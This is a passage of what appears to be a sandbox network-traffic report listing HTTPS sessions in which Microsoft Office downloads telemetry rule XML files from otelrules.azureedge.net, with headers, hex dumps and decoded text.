                                                                                                                                                                                                                            2024-11-06 13:39:48 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            139192.168.2.56201213.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:49 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:49 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:49 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1405
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                                                                            x-ms-request-id: e21fa4e1-f01e-003f-655f-2ed19d000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133949Z-15869dbbcc6kg5mvhC1DFWgs2s00000001g0000000004uym
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:49 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            140192.168.2.56201313.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:49 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:49 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:49 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1368
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                                                                            x-ms-request-id: 9f0c8f5e-f01e-0020-2b6b-2e956b000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133949Z-15869dbbcc6kg5mvhC1DFWgs2s00000001c000000000cz9g
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:49 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            141192.168.2.54976613.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:49 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:49 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 400
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                            x-ms-request-id: 23aea2f2-001e-0065-4c65-2e0b73000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133949Z-15869dbbcc6lxrkghC1DFWp3wc0000000750000000003czn
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:49 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            142192.168.2.56201613.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:49 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:49 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:49 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1378
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE584C214"
                                                                                                                                                                                                                            x-ms-request-id: 1cb8ce88-301e-0033-7f09-2cfa9c000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133949Z-16547b76f7ftdm8dhC1DFWs13g00000006sg00000000251w
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:49 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            143192.168.2.56201813.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:50 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:50 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:50 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1370
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                                                                            x-ms-request-id: 43525779-601e-003e-2ed2-2c3248000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133950Z-16547b76f7fwvr5dhC1DFW2c9400000006r0000000000da0
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:50 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            144192.168.2.56201713.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:50 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:50 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:50 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1407
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE687B46A"
                                                                                                                                                                                                                            x-ms-request-id: d0affd2c-301e-000c-74d2-2c323f000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133950Z-16547b76f7fp46ndhC1DFW66zg00000006ug0000000030p0
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:50 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            145192.168.2.56202113.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:50 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:50 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BEDC8193E"
                                                                                                                                                                                                                            x-ms-request-id: 856cb38d-401e-0078-52f7-2e4d34000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133950Z-17df447cdb5tcj54hC1DFW3yew00000002wg00000000ccvp
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:50 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            146192.168.2.56202013.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:50 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:50 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:50 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                                                                            x-ms-request-id: 524ac160-c01e-007a-69d2-2cb877000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133950Z-16547b76f7fq9mcrhC1DFWq15w00000006kg00000000ft6f
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:50 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            147192.168.2.56202313.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:51 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:51 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:51 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1369
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE32FE1A2"
                                                                                                                                                                                                                            x-ms-request-id: 44d511d9-701e-000d-2909-2c6de3000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133951Z-16547b76f7fm7xw6hC1DFW5px400000006m000000000ccmg
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
